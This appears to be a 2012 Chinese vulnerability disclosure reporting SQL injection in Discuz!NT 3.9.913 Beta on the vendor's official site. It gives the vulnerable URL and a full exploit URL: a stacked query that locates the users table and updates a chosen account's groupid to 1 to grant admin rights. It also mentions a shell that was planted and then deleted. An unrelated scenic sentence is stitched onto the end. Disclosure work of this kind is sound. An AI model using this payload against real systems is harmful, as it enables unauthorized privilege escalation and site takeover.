漏洞作者: Jannock
提交时间: 2012-02-13公开时间: 2012-02-18
漏洞类型: SQL注射漏洞简要描述:
DNT官网存在SQL注入漏洞,Powered by Discuz!NT 3.9.913 Beta
详细说明:
本来是测试凡客(),但发现官方也存在。注入地址:http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1利用:http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29–
Shell 已经删除
漏洞证明:
标签分类: SQL注入 漏洞 Discuz
大理的洱海形如人耳,风平浪静时,